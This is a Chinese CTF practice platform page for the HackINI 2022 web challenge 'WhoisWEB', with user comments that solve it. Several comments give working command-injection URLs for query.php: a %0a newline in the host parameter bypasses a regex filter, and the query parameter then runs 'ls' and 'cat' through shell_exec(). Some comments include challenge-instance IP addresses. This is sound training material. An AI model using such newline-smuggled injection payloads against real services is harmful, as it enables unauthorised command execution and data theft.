WhoisWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 965
提  示: There was a problem with the first version, this is the fixed version.
描  述:
A web-based Whois service
评论
chenrujun 3月前

BP抓包,绕过正则匹配过滤,host 和query 拼接成命令显示flag host=whois.verisign-grs.com%0a,%0a表示回车 query=ls查看当前目录文件 host=whois.verisign-grs.com%0a,%0a表示回车 query=cat 文件名

回复 0

Kokomi-FIRE 5月前

好像是利用参数拼接命令的玩意儿,得URL编码绕过

回复 0

MoCaser 8月前

不懂的建议花金币看看wp

回复 0

000ooo 11月前

①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1
zzz666 9月前

@cyffk 空格和换行会被url编码

回复 0

cyffk 11月前

为什么%不会被过滤?

回复 0

Zhumeng 11月前

查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码

回复 2

admin9101 1年前

http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

MOCHAOLIN 1年前

(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf

回复 1

wj834722134 1年前

host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内

回复 0
xwWx 9月前

@TOMCAT336699 x0a 是换行的话大概是 正则表达式只匹配换行之前的字符串

回复 0

TOMCAT336699 10月前

您弄明白了没有,你这个问题,我没找出答案来,谢谢

回复 0

Tao23 1年前

query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

to5ny 1年前

/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

WriteUp

image
hopeinhand

1 金币

评分(1)

解题动态

liang123456 攻破了该题 1天前
liukaidi 攻破了该题 3天前
chan52001 攻破了该题 5天前
jiangnanwithrain 攻破了该题 6天前
hzc30 攻破了该题 6天前
misare 攻破了该题 7天前
suona 攻破了该题 7天前
herrsol 攻破了该题 9天前
soha 攻破了该题 10天前
37519 攻破了该题 10天前
koin 攻破了该题 12天前
AOPKHES 攻破了该题 13天前
hengdonghui 攻破了该题 13天前
wqhgod 攻破了该题 15天前
IAMGLORIA 攻破了该题 16天前
pure0white0sword 攻破了该题 18天前
icingfire 攻破了该题 18天前
xjuqwd 攻破了该题 19天前
yamojito 攻破了该题 20天前
Nu11Zer 攻破了该题 21天前
问题反馈